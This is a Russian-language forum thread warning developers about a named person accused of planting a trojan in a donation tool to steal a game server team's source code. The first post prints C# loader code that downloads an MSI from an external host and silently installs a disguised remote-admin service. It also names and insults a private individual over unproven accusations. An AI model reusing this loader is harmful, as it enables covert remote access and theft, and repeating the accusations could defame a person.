Рейтинг темы:
  • 0 Голос(ов) - 0 в среднем
  • 1
  • 2
  • 3
  • 4
  • 5
Программерам и Админам на заметку.
#1
Буду краток т.к. не мастак писать малявы на людей.

Остерегайтесь любых контактов с юзером под ником Hitter (Ник в скайпе), логин в скайпе bluefoxe, Звать если не ошибаюсь Ольга далее Hitter.

В чем суть, Hitter сама вышла с нами на контакт предложил довольно щедрое финансирование нашей команды в замен на компил сборки ежемесячно и описание фиксов для своего локального сервера в своем городе если не ошибаюсь Норильск, внешка там дорогая у людей свобода только в локалке.

Ну мы взвесив все за и против тем более что локалка и были люди которые поручились за человека как надежного мы согласились.

Началось все с того что Hitter задержала оплату хотя исправно требовал фиксы, мы занимались работой под которую не подписывались и изначально было оговорено чем мы будем заниматься, а чем нет - это просмотр багфиксов на ее форуме, какие-то побочные работы по настройке сервера и сайта, и пр. Все это полностью было оговорено и лежало на плечах кидалы.

Не буду расписывать без надобности очень много подробностей ибо будет много текста...

Все закончилось тем что в очередной раз Hitter попросила сначала ANZO (видно с ним не проканало т.к. он сейчас весь в работе и редко делает то что не касается нашего сервера или его работы), потом Bacek'a чтобы он проверил очередной сервис Hitter по работе с донатом на сервере, это самописная на сях (как сказала Hitter) программа которая работала через телнет, но не в этом суть.
Самое странное в этой истории было следующее, Hitter сказала ANZO что эту программу писала сама от и до, но что-то не получается..., Ваську сказала что эту программу писал ее брат или друг, точно не помню. Т.к. до разбора полетов мы небыли в курсе что Hitter уже начала действовать за спинами наших коллег мы доверились и взялись помочь, как оказалось позже в эту софтину был зашит "троян", хотя трояном это сложно назвать т.к. это легальная софтинка которая не палится антивирусниками никак абсолютно, метод очень изящный т.к. заключается в том чтобы впарить кому угодно софтину чтобы тот ее запустил, чистая социальная инженерия.
[SRC="csharp"]
if (new FileInfo("C:\\Windows\\System32\\WindowsUpdate.msi").Exists)
return;
new WebClient().DownloadFile("http://meinkun.ru/data/WindowsUpdate.msi", "C:\\Windows\\System32\\WindowsUpdate.msi");
MainWindow.start("cmd.exe", "/C chcp 1251");
MainWindow.start("cmd.exe", "/C MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress");
MainWindow.start("cmd.exe", "/C MsiExec /x {B04BFE4C-7F11-49D8-ADFE-867939D886FA} /qn REBOOT=ReallySuppress");
MainWindow.start("cmd.exe", "/C ping 127.0.0.1");
MainWindow.start("cmd.exe", "/C MsiExec /I C:\\Windows\\System32\\WindowsUpdate.msi /qn");
MainWindow.start("cmd.exe", "/C reg delete HKCR\\Installer\\Products\\C4EFB40B11F78D94DAEF6897938D68AF /f");
MainWindow.start("cmd.exe", "/C attrib +s +h +r %systemroot%\\System32");
MainWindow.start("cmd.exe", "/C sc config RManService displayname=Windows Media");
MainWindow.start("cmd.exe", "/C sc description RManService Windows Media alloy media files downloads");
MainWindow.start("cmd.exe", "/C sc config RManService start=auto");
[/SRC]

В тихом режиме разворачивается что-то типа радмина и в реестре прописываются ключи доступа которые задал "хакер".

Т.к. большинство из нас в то время работал на износ почти 24\7 не смотря на работу и прочий досуг компьютеры не выключались, чем собственно и воспользовалась Hitter.
Пока все спали был стянут сурс с компа одного из разработчиков нашей команды.

Тогда мы еще не подозревали Hitter в том что это все по ее вине или даже что это Hitter была замешана. Начали разбор полетов и выяснилось что "трой" был зашит в одну из библиотек как раз таки того менеджера по работе с донатом. Т.к. у нас нет привычки качать с енета всякий шлак и запускать его без проверки как минимум анубиса и вирустотала.

После этого случая оплата услуг назовем это так стали затягиваться еще сильнее мы уже практически были готовы сказать что либо оплата вовремя либо досвидос рассказали о том что случилось.
Не буду вдаваться в подробности снова, Hitter все отрицала... Ну конечно Smile

Посочувствовали друг другу и приступили дальше все пилить. Каплей всему этому стало то что вдруг в енете всплывает проект dragonwind
На сборке копия нашей и о чудо, присваивают себе наш труд, ну то бог с ним бывает, сами виноваты...
Через некоторое время Hitter снова активизировалась и начала нам ставить ультиматумы и прочее для нас это стало последней каплей при том что с оплатой труда было совсем худо и из заявленной суммы там просрочка была внушительная по сумме. В итоге поругавшись мы таки сказали досвидос...
И что мы видим через несколько дней? На форуме dragonwind появился ник Hitter которая как не странно Администратор :dr:

Ну тут все встало на своя места, картина развернулась в полной мере. Весь этот цирк про финансирование был лишь отмазкой чтобы втереться в доверие (вспоминаем про социальную инженерию) и стянуть то что достигалось кровью и потом не один год тяжелой работы.

Hitter как человек на мой взгляд не нормальный и неуравновешенный, хотя бы потому что клялся своим ребенком, что сервер не ее и что она не имеет никакого отношения к проекту драгонвинд.
Скрин переписки чтобы было над чем задуматься на сколько человек ненормальный чтобы клясться ребенком и потом же нарушать свою клятву, слова словами, а они имеют свою силу.
[Изображение: f1393a.png]

Любые слова сказанные я могу подтвердить перепиской из скайпа.
Что могу посоветовать чтобы не попадаться на такие вещи вам. Никогда не соглашайтесь на доп работы за просто так, которые ранее небыли оговорены, не по доброте душевной, никак вообще. Не запускайте софт который дает клиент без предварительной проверки или запускайте на отдельной машине подальше от проектов или вовсе на виртуалке.

И пусть ваши проекты бережет компьютерный бог. :dy:
[Изображение: 61b684.png]
#2
Не красиво поступила данная особа надеюсь прочитавшие сделают вывод и откажутся от всякого сотрудничества с данной барышней)
:redlol:
#3
..Kirito.. Написал:Не красиво поступила данная особа надеюсь прочитавшие сделают вывод и откажутся от всякого сотрудничества с данной барышней)

Скажу прямо. Надеюсь за такой поступок, она самоликвидируется.
#4
Ей я желаю только одного, чтобы быстрее раскурочали то что им досталось, без нормальной сноровки разобраться будет тяжело в наших сурсах, судя по их форуму процесс ломания сборки уже начался. :de:
[Изображение: 61b684.png]
#5
Скажу только одно - более неадкватной, неприятной и безответственной особы я не встречал.
Желаю чтобы все воздалось по поступкам. Смееееееееерть и атттт :redlol:
#6
darkevil Написал:Ей я желаю только одного, чтобы быстрее раскурочали то что им досталось, без нормальной сноровки разобраться будет тяжело в наших сурсах, судя по их форуму процесс ломания сборки уже начался. :de:

Да не дадут ладу они вашим сурцам) Не то что-бы я их видел, но наблюдал за их работой с первых дней. Затирание репотров, выдуманные фиксы, еженедельная смена двигателей сайта\форума,шаровые дизы. Так что там просто :Olen':
:redlol:
#7
Почти как шпионская история со сноуденом и пендосами собирающие данные с помощью программBig Grin
Kakos Дайте Кастетчикам какойта УД. Без уд хреново падаєт бистро що ето капец, а єсли не УД то хотяби какойта хил.:redlol::redlol:
#8
Хитрый ход, спасибо за описание методики
#9
Mafio Написал:Почти как шпионская история со сноуденом и пендосами собирающие данные с помощью программBig Grin

В общих чертах так оно и вырисовывается. Много всего опустил иначе бы детектив бы был на пару страниц. :redlol:
Хотел еще короче написать, но увы не получилось. Sad
[Изображение: 61b684.png]
#10
darkevil Написал:В общих чертах так оно и вырисовывается. Много всего опустил иначе бы детектив бы был на пару страниц. :redlol:
Хотел еще короче написать, но увы не получилось. Sad

Главное чтоб этот детектив не был в течении 2 месяцев, главной новостью как со Сноуденом:redlol:
Kakos Дайте Кастетчикам какойта УД. Без уд хреново падаєт бистро що ето капец, а єсли не УД то хотяби какойта хил.:redlol::redlol:


Перейти к форуму:


Пользователи, просматривающие эту тему: 1 Гость(ей)